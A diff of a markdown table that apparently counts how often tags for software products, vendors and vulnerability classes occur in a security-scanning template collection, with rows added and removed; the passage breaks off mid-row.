-| rstudio | 3 | | | | | | | | | -| complete_online_job_search_system_project | 3 | | | | | | | | | -| sofacy | 3 | | | | | | | | | -| webalizer | 3 | | | | | | | | | -| webadmin | 3 | | | | | | | | | +| ruckuswireless | 3 | | | | | | | | | +| discourse | 3 | | | | | | | | | | nortek | 3 | | | | | | | | | -| fanruan | 3 | | | | | | | | | -| cluster | 3 | | | | | | | | | -| reddit | 3 | | | | | | | | | -| steve | 3 | | | | | | | | | -| trixbox | 3 | | | | | | | | | -| airtable | 3 | | | | | | | | | -| intercom | 3 | | | | | | | | | -| jitsi | 3 | | | | | | | | | -| rlm | 3 | | | | | | | | | -| ninjaforms | 3 | | | | | | | | | -| h2o | 3 | | | | | | | | | -| default | 3 | | | | | | | | | -| superadmin | 3 | | | | | | | | | -| ixcache | 3 | | | | | | | | | -| javascript | 3 | | | | | | | | | -| tautulli | 3 | | | | | | | | | +| httpbin | 3 | | | | | | | | | +| rackn | 3 | | | | | | | | | +| mpsec | 3 | | | | | | | | | +| axis2 | 3 | | | | | | | | | +| std42 | 3 | | | | | | | | | +| anonymous | 3 | | | | | | | | | +| rubygems | 3 | | | | | | | | | +| e-cology | 3 | | | | | | | | | +| monitor | 3 | | | | | | | | | | eshop | 3 | | | | | | | | | -| apollo | 3 | | | | | | | | | -| gibbon | 3 | | | | | | | | | -| digitalrebar | 3 | | | | | | | | | -| securepoint | 3 | | | | | | | | | -| favicon | 3 | | | | | | | | | -| 3cx | 3 | | | | | | | | | -| modem | 3 | | | | | | | | | -| instagram | 3 | | | | | | | | | -| jeesns | 3 | | | | | | | | | -| superwebmailer | 3 | | | | | | | | | -| yii | 3 | | | | | | | | | -| kfm | 3 | | | | | | | | | -| diagrams | 3 | | | | | | | | | -| webnus | 3 | | | | | | | | | -| backdropcms | 3 | | | | | | | | | -| sonatype | 3 | | | | | | | | | +| draytek | 3 | | | | | | | | | +| modoboa | 3 | | | | | | | | | +| fanruan | 3 | | | | | | | | | +| tableau | 3 | | | | | | | | | +| credential | 3 | | | | | | | | | +| epson | 3 | | | | | | | | | +| webalizer | 3 | | | | | | | | | +| unifi | 3 | | | | | | | | | +| trixbox | 3 | | | | | | | | | +| netflix | 3 | | | | | | | | | +| sony | 3 | | | | | | | | | +| fanwei | 3 | | | | | | | | | +| clusterengine | 3 | | | | | | | | | +| boldgrid | 3 | | | | | | | | | +| dzzoffice | 3 | | | | | | | | | +| drawio | 3 | | | | | | | | | +| sudo | 3 | | | | | | | | | +| csti | 3 | | | | | | | | | +| movable | 3 | | | | | | | | | +| academylms | 3 | | | | | | | | | | mongo | 3 | | | | | | | | | -| cobblerd | 2 | | | | | | | | | -| resourcespace | 2 | | | | | | | | | -| netis | 2 | | | | | | | | | -| novnc | 2 | | | | | | | | | -| ecoa | 2 | | | | | | | | | -| frontpage | 2 | | | | | | | | | -| vidyo | 2 | | | | | | | | | -| nuxeo | 2 | | | | | | | | | -| fortinac | 2 | | | | | | | | | -| steam | 2 | | | | | | | | | -| appspace | 2 | | | | | | | | | -| pinterest | 2 | | | | | | | | | -| qihang | 2 | | | | | | | | | -| digitalzoomstudio | 2 | | | | | | | | | -| fortiproxy | 2 | | | | | | | | | -| rapid7 | 2 | | | | | | | | | -| keybase | 2 | | | | | | | | | -| ciamore-gateway | 2 | | | | | | | | | -| kunalnagar | 2 | | | | | | | | | -| odbc | 2 | | | | | | | | | -| nordex | 2 | | | | | | | | | -| seacms | 2 | | | | | | | | | -| memcached | 2 | | | | | | | | | -| faculty_evaluation_system_project | 2 | | | | | | | | | -| lsoft | 2 | | | | | | | | | -| urosevic | 2 | | | | | | | | | -| zeppelin | 2 | | | | | | | | | -| faculty | 2 | | | | | | | | | -| zimbllc | 2 | | | | | | | | | -| mflow | 2 | | | | | | | | | -| totemomail | 2 | | | | | | | | | -| wdcloud | 2 | | | | | | | | | -| cocoon | 2 | | | | | | | | | -| duplicator | 2 | | | | | | | | | -| kubepi | 2 | | | | | | | | | -| wowza | 2 | | | | | | | | | -| dbgate | 2 | | | | | | | | | -| pickplugins | 2 | | | | | | | | | -| tecrail | 2 | | | | | | | | | -| places | 2 | | | | | | | | | -| finger | 2 | | | | | | | | | -| modern-events-calendar-lite | 2 | | | | | | | | | -| flir | 2 | | | | | | | | | -| redcomponent | 2 | | | | | | | | | -| gespage | 2 | | | | | | | | | -| pulse | 2 | | | | | | | | | -| ambari | 2 | | | | | | | | | -| crestron | 2 | | | | | | | | | -| forcepoint | 2 | | | | | | | | | -| themeum | 2 | | | | | | | | | -| kkFileView | 2 | | | | | | | | | -| uptime | 2 | | | | | | | | | -| aqua | 2 | | | | | | | | | -| wordnik | 2 | | | | | | | | | -| bluetermite | 2 | | | | | | | | | -| yapi | 2 | | | | | | | | | -| nocodb | 2 | | | | | | | | | -| version | 2 | | | | | | | | | -| bitly | 2 | | | | | | | | | -| jsherp | 2 | | | | | | | | | -| empire | 2 | | | | | | | | | -| genieacs | 2 | | | | | | | | | -| gsm | 2 | | | | | | | | | -| bitwarden | 2 | | | | | | | | | -| gitlist | 2 | | | | | | | | | -| combodo | 2 | | | | | | | | | -| corebos | 2 | | | | | | | | | -| goip | 2 | | | | | | | | | -| clansphere | 2 | | | | | | | | | -| burp | 2 | | | | | | | | | -| showdoc | 2 | | | | | | | | | -| rsync | 2 | | | | | | | | | -| ucmdb | 2 | | | | | | | | | -| submitty | 2 | | | | | | | | | -| montala | 2 | | | | | | | | | -| codedropz | 2 | | | | | | | | | -| debian | 2 | | | | | | | | | -| kiwitcms | 2 | | | | | | | | | -| unigui | 2 | | | | | | | | | -| loqate | 2 | | | | | | | | | -| avcon6 | 2 | | | | | | | | | -| tapestry | 2 | | | | | | | | | -| bigantsoft | 2 | | | | | | | | | -| etherpad | 2 | | | | | | | | | -| tileserver | 2 | | | | | | | | | -| blazor | 2 | | | | | | | | | -| wing | 2 | | | | | | | | | -| axxonsoft | 2 | | | | | | | | | -| azkaban | 2 | | | | | | | | | -| icinga | 2 | | | | | | | | | -| supermicro | 2 | | | | | | | | | -| webui | 2 | | | | | | | | | -| ametys | 2 | | | | | | | | | -| nps | 2 | | | | | | | | | -| glibc | 2 | | | | | | | | | -| yahoo | 2 | | | | | | | | | -| o2 | 2 | | | | | | | | | -| javamelody | 2 | | | | | | | | | -| epmm | 2 | | | | | | | | | -| heateor | 2 | | | | | | | | | -| enterprise | 2 | | | | | | | | | -| plugins360 | 2 | | | | | | | | | -| office-webapps | 2 | | | | | | | | | -| allied | 2 | | | | | | | | | -| tooljet | 2 | | | | | | | | | -| umami | 2 | | | | | | | | | -| glances | 2 | | | | | | | | | -| session | 2 | | | | | | | | | -| 2code | 2 | | | | | | | | | -| scan | 2 | | | | | | | | | -| mcms | 2 | | | | | | | | | -| peoplesoft | 2 | | | | | | | | | -| screenconnect | 2 | | | | | | | | | -| gryphon | 2 | | | | | | | | | -| perl | 2 | | | | | | | | | -| beamer | 2 | | | | | | | | | -| ecshop | 2 | | | | | | | | | -| blogengine | 2 | | | | | | | | | -| atmail | 2 | | | | | | | | | -| cdn | 2 | | | | | | | | | -| bricks | 2 | | | | | | | | | -| yarn | 2 | | | | | | | | | -| mdm | 2 | | | | | | | | | -| xenmobile | 2 | | | | | | | | | -| find | 2 | | | | | | | | | -| xampp | 2 | | | | | | | | | -| librenms | 2 | | | | | | | | | -| relatedposts | 2 | | | | | | | | | -| amcrest | 2 | | | | | | | | | -| tencent | 2 | | | | | | | | | -| wazuh | 2 | | | | | | | | | -| wildfly | 2 | | | | | | | | | -| defacement | 2 | | | | | | | | | -| cnvd2017 | 2 | | | | | | | | | -| composer | 2 | | | | | | | | | -| dependency | 2 | | | | | | | | | -| overflow | 2 | | | | | | | | | -| beanshell | 2 | | | | | | | | | -| contao | 2 | | | | | | | | | -| soa | 2 | | | | | | | | | -| utm | 2 | | | | | | | | | -| sliver | 2 | | | | | | | | | -| photo-gallery | 2 | | | | | | | | | -| wipro | 2 | | | | | | | | | -| copyparty_project | 2 | | | | | | | | | -| keo | 2 | | | | | | | | | -| notion | 2 | | | | | | | | | -| eventon | 2 | | | | | | | | | -| eims | 2 | | | | | | | | | -| rocketmq | 2 | | | | | | | | | -| aviatrix | 2 | | | | | | | | | -| ourphp | 2 | | | | | | | | | -| w3-total-cache | 2 | | | | | | | | | -| jumpserver | 2 | | | | | | | | | -| smartstore | 2 | | | | | | | | | -| themeisle | 2 | | | | | | | | | -| alfresco | 2 | | | | | | | | | -| oscommerce | 2 | | | | | | | | | -| securenvoy | 2 | | | | | | | | | -| spider-event-calendar | 2 | | | | | | | | | -| cassia | 2 | | | | | | | | | -| ml | 2 | | | | | | | | | -| csti | 2 | | | | | | | | | -| wapples | 2 | | | | | | | | | -| owasp | 2 | | | | | | | | | -| backups | 2 | | | | | | | | | -| gopher | 2 | | | | | | | | | -| kedacom | 2 | | | | | | | | | -| quantumcloud | 2 | | | | | | | | | -| razer | 2 | | | | | | | | | -| werkzeug | 2 | | | | | | | | | -| dompdf | 2 | | | | | | | | | -| livezilla | 2 | | | | | | | | | -| guacamole | 2 | | | | | | | | | -| postgres | 2 | | | | | | | | | -| embedthis | 2 | | | | | | | | | -| turnkey | 2 | | | | | | | | | -| netscaler | 2 | | | | | | | | | -| neos | 2 | | | | | | | | | -| kettle | 2 | | | | | | | | | -| dg | 2 | | | | | | | | | -| webex | 2 | | | | | | | | | -| otobo | 2 | | | | | | | | | -| airtame | 2 | | | | | | | | | -| encryption | 2 | | | | | | | | | -| plugins-market | 2 | | | | | | | | | -| repetier-server | 2 | | | | | | | | | -| hetzner | 2 | | | | | | | | | -| youtube | 2 | | | | | | | | | -| thenewsletterplugin | 2 | | | | | | | | | -| orchid | 2 | | | | | | | | | -| onlyoffice | 2 | | | | | | | | | -| ejs | 2 | | | | | | | | | -| php-fusion | 2 | | | | | | | | | -| advanced-booking-calendar | 2 | | | | | | | | | -| commscope | 2 | | | | | | | | | -| milesight | 2 | | | | | | | | | -| mgt-commerce | 2 | | | | | | | | | -| stealer | 2 | | | | | | | | | -| bws-contact-form | 2 | | | | | | | | | -| stock-ticker | 2 | | | | | | | | | -| webpagetest | 2 | | | | | | | | | -| vault | 2 | | | | | | | | | -| tidb | 2 | | | | | | | | | -| skycaiji | 2 | | | | | | | | | -| erxes | 2 | | | | | | | | | -| sass | 2 | | | | | | | | | -| easy | 2 | | | | | | | | | -| runner | 2 | | | | | | | | | -| patreon | 2 | | | | | | | | | -| dribbble | 2 | | | | | | | | | -| codeclimate | 2 | | | | | | | | | -| zywall | 2 | | | | | | | | | -| impresscms | 2 | | | | | | | | | -| tiny | 2 | | | | | | | | | -| middleware | 2 | | | | | | | | | -| ecology-oa | 2 | | | | | | | | | -| gocardless | 2 | | | | | | | | | -| odm | 2 | | | | | | | | | -| timekeeper | 2 | | | | | | | | | -| topsec | 2 | | | | | | | | | -| woocommerce-for-japan | 2 | | | | | | | | | -| saprouter | 2 | | | | | | | | | -| repetier | 2 | | | | | | | | | -| mstore-api | 2 | | | | | | | | | -| seowon | 2 | | | | | | | | | -| xweb500 | 2 | | | | | | | | | -| filebrowser | 2 | | | | | | | | | -| sqlite3 | 2 | | | | | | | | | -| adserver | 2 | | | | | | | | | -| fortimail | 2 | | | | | | | | | -| domxss | 2 | | | | | | | | | -| event | 2 | | | | | | | | | -| hadoop | 2 | | | | | | | | | -| xmpp | 2 | | | | | | | | | -| beanstalk | 2 | | | | | | | | | -| omnia | 2 | | | | | | | | | -| dpi | 2 | | | | | | | | | -| auerswald | 2 | | | | | | | | | -| ui | 2 | | | | | | | | | -| notificationx | 2 | | | | | | | | | -| fcm | 2 | | | | | | | | | -| mosparo | 2 | | | | | | | | | -| spf | 2 | | | | | | | | | -| oidc | 2 | | | | | | | | | -| huggingface | 2 | | | | | | | | | -| artisanworkshop | 2 | | | | | | | | | -| directorist | 2 | | | | | | | | | -| eris | 2 | | | | | | | | | -| gitter | 2 | | | | | | | | | -| hasura | 2 | | | | | | | | | -| unisharp | 2 | | | | | | | | | -| ovirt | 2 | | | | | | | | | -| cve2006 | 2 | | | | | | | | | -| conductor | 2 | | | | | | | | | -| namespaces | 2 | | | | | | | | | -| paid-memberships-pro | 2 | | | | | | | | | -| rocket.chat | 2 | | | | | | | | | -| akkadian | 2 | | | | | | | | | -| pos | 2 | | | | | | | | | -| havoc | 2 | | | | | | | | | -| tiktok | 2 | | | | | | | | | -| uwsgi | 2 | | | | | | | | | -| place | 2 | | | | | | | | | -| mailer | 2 | | | | | | | | | -| wpchill | 2 | | | | | | | | | -| shellshock | 2 | | | | | | | | | -| eko | 2 | | | | | | | | | -| jinher | 2 | | | | | | | | | -| websocket | 2 | | | | | | | | | -| apereo | 2 | | | | | | | | | -| honeywell | 2 | | | | | | | | | -| sonarsource | 2 | | | | | | | | | -| magento_server | 2 | | | | | | | | | -| simplefilelist | 2 | | | | | | | | | -| openshift | 2 | | | | | | | | | -| plastic | 2 | | | | | | | | | -| qloapps | 2 | | | | | | | | | -| opnsense | 2 | | | | | | | | | -| nystudio107 | 2 | | | | | | | | | -| jquery | 2 | | | | | | | | | -| miniorange | 2 | | | | | | | | | -| hostheader-injection | 2 | | | | | | | | | -| poisoning | 2 | | | | | | | | | -| gibbonedu | 2 | | | | | | | | | -| myfactory | 2 | | | | | | | | | -| tplink | 2 | | | | | | | | | -| dw | 2 | | | | | | | | | -| pgadmin | 2 | | | | | | | | | -| nas | 2 | | | | | | | | | -| barco | 2 | | | | | | | | | -| quora | 2 | | | | | | | | | -| bitdefender | 2 | | | | | | | | | -| hdw-tube_project | 2 | | | | | | | | | -| peter_hocherl | 2 | | | | | | | | | -| spa-cart | 2 | | | | | | | | | -| eoffice | 2 | | | | | | | | | -| fortiap | 2 | | | | | | | | | -| ntopng | 2 | | | | | | | | | -| cobalt-strike | 2 | | | | | | | | | -| codemeter | 2 | | | | | | | | | -| finereport | 2 | | | | | | | | | -| cassandra | 2 | | | | | | | | | -| uvdesk | 2 | | | | | | | | | -| highmail | 2 | | | | | | | | | -| chiyu | 2 | | | | | | | | | -| ntop | 2 | | | | | | | | | -| dynamicweb | 2 | | | | | | | | | -| cypress | 2 | | | | | | | | | -| hubspot | 2 | | | | | | | | | -| wampserver | 2 | | | | | | | | | -| flightpath | 2 | | | | | | | | | -| tielabs | 2 | | | | | | | | | -| alienvault | 2 | | | | | | | | | -| homeassistant | 2 | | | | | | | | | -| commax | 2 | | | | | | | | | -| wpms | 2 | | | | | | | | | -| cve2004 | 2 | | | | | | | | | -| apikey | 2 | | | | | | | | | -| iptime | 2 | | | | | | | | | -| iplanet | 2 | | | | | | | | | -| rosariosis | 2 | | | | | | | | | -| plugin-planet | 2 | | | | | | | | | -| skype | 2 | | | | | | | | | -| masacms | 2 | | | | | | | | | -| intellian | 2 | | | | | | | | | -| viewpoint | 2 | | | | | | | | | -| zblogcn | 2 | | | | | | | | | -| craftercms | 2 | | | | | | | | | -| testrail | 2 | | | | | | | | | -| zzcms | 2 | | | | | | | | | -| bomgar | 2 | | | | | | | | | -| syncserver | 2 | | | | | | | | | -| webshells | 2 | | | | | | | | | -| authbypass | 2 | | | | | | | | | -| pop3 | 2 | | | | | | | | | -| shad0w | 2 | | | | | | | | | -| portainer | 2 | | | | | | | | | -| ispy | 2 | | | | | | | | | -| memory | 2 | | | | | | | | | -| concrete5 | 2 | | | | | | | | | -| rundeck | 2 | | | | | | | | | -| pathtraversal | 2 | | | | | | | | | -| cloudinary | 2 | | | | | | | | | -| usc-e-shop | 2 | | | | | | | | | -| igs | 2 | | | | | | | | | -| intelliantech | 2 | | | | | | | | | -| secretkey | 2 | | | | | | | | | -| docs | 2 | | | | | | | | | -| influxdata | 2 | | | | | | | | | -| pbootcms | 2 | | | | | | | | | -| cloudpanel | 2 | | | | | | | | | -| phpldapadmin | 2 | | | | | | | | | -| mojoportal | 2 | | | | | | | | | -| notebook | 2 | | | | | | | | | -| idoc | 2 | | | | | | | | | -| chiyu-tech | 2 | | | | | | | | | -| frameio | 2 | | | | | | | | | -| eventum | 2 | | | | | | | | | -| acme | 2 | | | | | | | | | -| ivms | 2 | | | | | | | | | -| phpshowtime | 2 | | | | | | | | | -| traefik | 2 | | | | | | | | | -| acereporter | 2 | | | | | | | | | -| opera | 2 | | | | | | | | | -| wp-stats-manager | 2 | | | | | | | | | -| eset | 2 | | | | | | | | | -| dynatrace | 2 | | | | | | | | | -| acenet | 2 | | | | | | | | | -| portal | 2 | | | | | | | | | -| phpcollab | 2 | | | | | | | | | -| form | 2 | | | | | | | | | -| hestiacp | 2 | | | | | | | | | -| sdwan | 2 | | | | | | | | | -| ericsson | 2 | | | | | | | | | -| ilias | 2 | | | | | | | | | -| cal | 2 | | | | | | | | | -| exacqvision | 2 | | | | | | | | | -| frp | 2 | | | | | | | | | -| welaunch | 2 | | | | | | | | | -| online-shopping-system-advanced_project | 2 | | | | | | | | | -| mercurial | 2 | | | | | | | | | -| clickhouse | 2 | | | | | | | | | -| iconfinder | 2 | | | | | | | | | -| kong | 2 | | | | | | | | | -| sauce | 2 | | | | | | | | | -| aircube | 2 | | | | | | | | | -| default-logins | 2 | | | | | | | | | -| natshell | 2 | | | | | | | | | -| naver | 2 | | | | | | | | | -| freshbooks | 2 | | | | | | | | | -| wuzhicms | 2 | | | | | | | | | -| ojs | 2 | | | | | | | | | -| synopsys | 2 | | | | | | | | | -| roblox | 2 | | | | | | | | | -| mingsoft | 2 | | | | | | | | | -| dump | 2 | | | | | | | | | -| synapse | 2 | | | | | | | | | -| rsa | 2 | | | | | | | | | -| collne | 2 | | | | | | | | | -| jmx | 2 | | | | | | | | | -| idea | 2 | | | | | | | | | -| virustotal | 2 | | | | | | | | | -| nodebb | 2 | | | | | | | | | -| raspap | 2 | | | | | | | | | -| wetransfer | 2 | | | | | | | | | -| pagespeed | 2 | | | | | | | | | -| lenovo | 2 | | | | | | | | | -| dvwa | 2 | | | | | | | | | -| trello | 2 | | | | | | | | | -| mongo-express_project | 2 | | | | | | | | | -| spectrum | 2 | | | | | | | | | -| wechat | 2 | | | | | | | | | -| pacsone | 2 | | | | | | | | | -| accesskey | 2 | | | | | | | | | -| ebay | 2 | | | | | | | | | -| smartdatasoft | 2 | | | | | | | | | -| scriptcase | 2 | | | | | | | | | -| cargo | 2 | | | | | | | | | -| shopware | 2 | | | | | | | | | -| xml | 2 | | | | | | | | | -| wptouch | 2 | | | | | | | | | -| gophish | 2 | | | | | | | | | -| adenion | 2 | | | | | | | | | -| ironpanda | 2 | | | | | | | | | -| sas | 2 | | | | | | | | | -| maltrail | 2 | | | | | | | | | -| zenml | 2 | | | | | | | | | -| chyrp | 2 | | | | | | | | | -| pascom | 2 | | | | | | | | | -| zblogphp | 2 | | | | | | | | | -| ubnt | 2 | | | | | | | | | -| klr300n | 2 | | | | | | | | | -| nasos | 2 | | | | | | | | | -| webuzo | 2 | | | | | | | | | -| icecast | 2 | | | | | | | | | -| code42 | 2 | | | | | | | | | -| t3 | 2 | | | | | | | | | -| opencpu | 2 | | | | | | | | | -| rejetto | 2 | | | | | | | | | -| opsview | 2 | | | | | | | | | -| jeedom | 2 | | | | | | | | | -| virtua | 2 | | | | | | | | | -| fastcgi | 2 | | | | | | | | | -| landesk | 2 | | | | | | | | | -| codekop | 2 | | | | | | | | | -| wpwax | 2 | | | | | | | | | -| deviantart | 2 | | | | | | | | | -| ios | 2 | | | | | | | | | -| acunetix | 2 | | | | | | | | | -| myanimelist | 2 | | | | | | | | | -| netmizer | 2 | | | | | | | | | -| os | 2 | | | | | | | | | -| text | 2 | | | | | | | | | -| syslog | 2 | | | | | | | | | -| puppetdb | 2 | | | | | | | | | -| avalanche | 2 | | | | | | | | | -| jsmol2wp_project | 2 | | | | | | | | | -| episerver | 2 | | | | | | | | | -| codemenschen | 2 | | | | | | | | | -| ditty-news-ticker | 2 | | | | | | | | | -| wp-automatic | 2 | | | | | | | | | -| tshirtecommerce | 2 | | | | | | | | | -| softaculous | 2 | | | | | | | | | -| eprints | 2 | | | | | | | | | -| cmdi | 2 | | | | | | | | | -| rockmongo | 2 | | | | | | | | | -| fiori | 2 | | | | | | | | | -| emby | 2 | | | | | | | | | -| thedaylightstudio | 2 | | | | | | | | | -| softether | 2 | | | | | | | | | -| aspcms | 2 | | | | | | | | | -| gitblit | 2 | | | | | | | | | -| masa | 2 | | | | | | | | | -| gift-voucher | 2 | | | | | | | | | -| seeddms | 2 | | | | | | | | | -| download | 2 | | | | | | | | | -| weather | 2 | | | | | | | | | -| xnat | 2 | | | | | | | | | -| transposh | 2 | | | | | | | | | -| tamronos | 2 | | | | | | | | | -| coinbase | 2 | | | | | | | | | -| h2o-3 | 2 | | | | | | | | | -| monitoring | 2 | | | | | | | | | -| servicedesk | 2 | | | | | | | | | -| fudforum | 2 | | | | | | | | | -| phpmyfaq | 2 | | | | | | | | | -| ays-pro | 2 | | | | | | | | | -| mida | 2 | | | | | | | | | -| openbsd | 2 | | | | | | | | | -| metagauss | 2 | | | | | | | | | -| foobla | 2 | | | | | | | | | -| premio | 2 | | | | | | | | | -| holmes | 2 | | | | | | | | | -| pypiserver | 2 | | | | | | | | | -| ajp | 2 | | | | | | | | | -| tp-link | 2 | | | | | | | | | -| esphome | 2 | | | | | | | | | -| AfterLogic | 2 | | | | | | | | | -| fortiweb | 2 | | | | | | | | | -| evilmartians | 2 | | | | | | | | | -| boa | 2 | | | | | | | | | -| custom-404-pro | 2 | | | | | | | | | -| xceedium | 2 | | | | | | | | | -| hue | 2 | | | | | | | | | -| fortra | 2 | | | | | | | | | -| nextcloud | 2 | | | | | | | | | -| doris | 2 | | | | | | | | | -| reolink | 2 | | | | | | | | | -| avantfax | 2 | | | | | | | | | -| ms-exchange | 2 | | | | | | | | | -| vscode | 2 | | | | | | | | | -| turla | 2 | | | | | | | | | -| jabbers | 2 | | | | | | | | | -| webtitan | 2 | | | | | | | | | -| opennms | 2 | | | | | | | | | -| livehelperchat | 2 | | | | | | | | | -| watu | 2 | | | | | | | | | -| paytm-payments | 2 | | | | | | | | | -| kubeview_project | 2 | | | | | | | | | -| online_event_booking_and_reservation_system_project | 2 | | | | | | | | | -| workspaceone | 2 | | | | | | | | | -| espeasy | 2 | | | | | | | | | -| backupbuddy | 2 | | | | | | | | | -| algolia | 2 | | | | | | | | | -| eq-3 | 2 | | | | | | | | | -| jsp | 2 | | | | | | | | | -| open-xchange | 2 | | | | | | | | | -| cloudcenter | 2 | | | | | | | | | -| yealink | 2 | | | | | | | | | -| sentinel | 2 | | | | | | | | | -| pam | 2 | | | | | | | | | -| fleetcart | 2 | | | | | | | | | -| idor | 2 | | | | | | | | | -| opensearch | 2 | | | | | | | | | -| sudo_project | 2 | | | | | | | | | -| aerohive | 2 | | | | | | | | | -| stackposts | 2 | | | | | | | | | -| wooyun | 2 | | | | | | | | | -| lantronix | 2 | | | | | | | | | -| rackstation | 2 | | | | | | | | | -| shenyu | 2 | | | | | | | | | -| dataease | 2 | | | | | | | | | -| karaf | 2 | | | | | | | | | -| zms | 2 | | | | | | | | | -| control-webpanel | 2 | | | | | | | | | -| ranger | 2 | | | | | | | | | -| smugmug | 2 | | | | | | | | | -| maian | 2 | | | | | | | | | -| haproxy | 2 | | | | | | | | | -| stagil | 2 | | | | | | | | | -| motorola | 2 | | | | | | | | | -| homematic | 2 | | | | | | | | | -| node-red-dashboard | 2 | | | | | | | | | -| pastebin | 2 | | | | | | | | | -| draftpress | 2 | | | | | | | | | -| razorpay | 2 | | | | | | | | | -| konga | 2 | | | | | | | | | -| j2ee | 2 | | | | | | | | | -| dnnsoftware | 2 | | | | | | | | | +| dotnetnuke | 3 | | | | | | | | | +| spip | 3 | | | | | | | | | +| buffalo | 3 | | | | | | | | | +| ninjaforms | 3 | | | | | | | | | +| joomlacomponent.inetlanka | 3 | | | | | | | | | +| forgerock | 3 | | | | | | | | | +| itop | 3 | | | | | | | | | +| nuget | 3 | | | | | | | | | +| securepoint | 3 | | | | | | | | | +| fileman | 3 | | | | | | | | | +| thinfinity | 3 | | | | | | | | | +| osticket | 3 | | | | | | | | | +| sharefile | 3 | | | | | | | | | +| smuggling | 3 | | | | | | | | | +| phpipam | 3 | | | | | | | | | +| kfm | 3 | | | | | | | | | +| aruba | 3 | | | | | | | | | +| tplus | 3 | | | | | | | | | +| netlify | 3 | | | | | | | | | +| ad | 3 | | | | | | | | | +| idor | 3 | | | | | | | | | +| complete_online_job_search_system_project | 3 | | | | | | | | | +| covenant | 3 | | | | | | | | | +| management-system | 3 | | | | | | | | | +| webtareas_project | 3 | | | | | | | | | +| pulsar | 3 | | | | | | | | | +| wordfence | 3 | | | | | | | | | +| dubbo | 3 | | | | | | | | | +| soplanning | 3 | | | | | | | | | +| adafruit | 3 | | | | | | | | | +| nc | 3 | | | | | | | | | +| gradle | 3 | | | | | | | | | +| bigant | 3 | | | | | | | | | +| cookie | 3 | | | | | | | | | +| r-seenet | 3 | | | | | | | | | +| emqx | 3 | | | | | | | | | +| airtable | 3 | | | | | | | | | +| openwrt | 3 | | | | | | | | | +| posh | 3 | | | | | | | | | +| cgi | 3 | | | | | | | | | +| sqlite | 3 | | | | | | | | | +| pandorafms | 3 | | | | | | | | | +| webadmin | 3 | | | | | | | | | +| hjsoft | 3 | | | | | | | | | +| labkey | 3 | | | | | | | | | +| samba | 3 | | | | | | | | | +| dreambox | 3 | | | | | | | | | +| payara | 3 | | | | | | | | | +| reddit | 3 | | | | | | | | | +| netdata | 3 | | | | | | | | | +| contribsys | 3 | | | | | | | | | +| trendnet | 3 | | | | | | | | | +| label-studio | 3 | | | | | | | | | +| sonatype | 3 | | | | | | | | | +| openbmcs | 3 | | | | | | | | | +| fuelcms | 3 | | | | | | | | | +| mailgun | 3 | | | | | | | | | +| decision-server | 3 | | | | | | | | | +| mythic | 3 | | | | | | | | | | ilo | 2 | | | | | | | | | -| wpqa | 2 | | | | | | | | | -| getgrav | 2 | | | | | | | | | -| poste | 2 | | | | | | | | | -| hiveos | 2 | | | | | | | | | -| wikipedia | 2 | | | | | | | | | -| discuz | 2 | | | | | | | | | -| graphite | 2 | | | | | | | | | -| prestshop | 2 | | | | | | | | | -| appsuite | 2 | | | | | | | | | -| cve2001 | 2 | | | | | | | | | -| phpcli | 2 | | | | | | | | | -| nextgen | 2 | | | | | | | | | -| junos | 2 | | | | | | | | | -| ipconfigure | 2 | | | | | | | | | -| u8-crm | 2 | | | | | | | | | -| roberto_aloi | 2 | | | | | | | | | -| email | 2 | | | | | | | | | -| trilium | 2 | | | | | | | | | -| twitch | 2 | | | | | | | | | -| roxyfileman | 2 | | | | | | | | | -| csphere | 2 | | | | | | | | | -| shortpixel | 2 | | | | | | | | | -| ninja | 2 | | | | | | | | | -| minidionis | 2 | | | | | | | | | -| gitbook | 2 | | | | | | | | | -| hospital | 2 | | | | | | | | | -| accela | 2 | | | | | | | | | -| owa | 2 | | | | | | | | | -| dash | 2 | | | | | | | | | -| bigbluebutton | 2 | | | | | | | | | -| perfsonar | 2 | | | | | | | | | +| owasp | 2 | | | | | | | | | | securetransport | 2 | | | | | | | | | -| appcms | 2 | | | | | | | | | -| virtuasoftware | 2 | | | | | | | | | -| cisa | 2 | | | | | | | | | -| horizon | 2 | | | | | | | | | -| apigee | 2 | | | | | | | | | -| camunda | 2 | | | | | | | | | -| marvikshop | 2 | | | | | | | | | -| casbin | 2 | | | | | | | | | -| paytm | 2 | | | | | | | | | -| self-signed | 2 | | | | | | | | | -| giphy | 2 | | | | | | | | | -| flask | 2 | | | | | | | | | -| pulsesecure | 2 | | | | | | | | | -| wago | 2 | | | | | | | | | -| adivaha | 2 | | | | | | | | | -| sniplets | 2 | | | | | | | | | -| kylin | 2 | | | | | | | | | -| sourcecodester | 2 | | | | | | | | | -| gallery | 2 | | | | | | | | | -| spartacus | 2 | | | | | | | | | -| terraform | 2 | | | | | | | | | -| glowroot | 2 | | | | | | | | | -| virtualui | 2 | | | | | | | | | -| blms | 2 | | | | | | | | | -| dc | 2 | | | | | | | | | -| readme | 2 | | | | | | | | | -| aryanic | 2 | | | | | | | | | -| duffel | 2 | | | | | | | | | -| finnhub | 2 | | | | | | | | | -| xsuite | 2 | | | | | | | | | -| svn | 2 | | | | | | | | | -| caseaware | 2 | | | | | | | | | -| sauter | 2 | | | | | | | | | -| helpdesk | 2 | | | | | | | | | -| e-search_project | 2 | | | | | | | | | -| hjtcloud | 2 | | | | | | | | | -| openresty | 2 | | | | | | | | | -| secnet | 2 | | | | | | | | | -| sequoiadb | 2 | | | | | | | | | -| tasmota | 2 | | | | | | | | | -| wpml | 2 | | | | | | | | | -| thingsboard | 2 | | | | | | | | | -| purchase-order-management-system | 2 | | | | | | | | | -| adbhoney | 2 | | | | | | | | | -| phuket | 2 | | | | | | | | | -| tornado | 2 | | | | | | | | | -| sixapart | 2 | | | | | | | | | -| upload | 2 | | | | | | | | | -| qcubed | 2 | | | | | | | | | -| netsus | 2 | | | | | | | | | -| opentsdb | 2 | | | | | | | | | -| wamp | 2 | | | | | | | | | -| akkadianlabs | 2 | | | | | | | | | -| kanboard | 2 | | | | | | | | | -| epm | 2 | | | | | | | | | -| databricks | 2 | | | | | | | | | -| mega | 2 | | | | | | | | | -| ecstatic | 2 | | | | | | | | | -| hitachi | 2 | | | | | | | | | -| clojars | 2 | | | | | | | | | +| paid-memberships-pro | 2 | | | | | | | | | +| wechat | 2 | | | | | | | | | +| vercel | 2 | | | | | | | | | +| glibc | 2 | | | | | | | | | | mf_gig_calendar_project | 2 | | | | | | | | | -| acrolinx | 2 | | | | | | | | | -| matomo | 2 | | | | | | | | | -| microchip | 2 | | | | | | | | | -| smartbi | 2 | | | | | | | | | -| clamav | 2 | | | | | | | | | -| ebook | 2 | | | | | | | 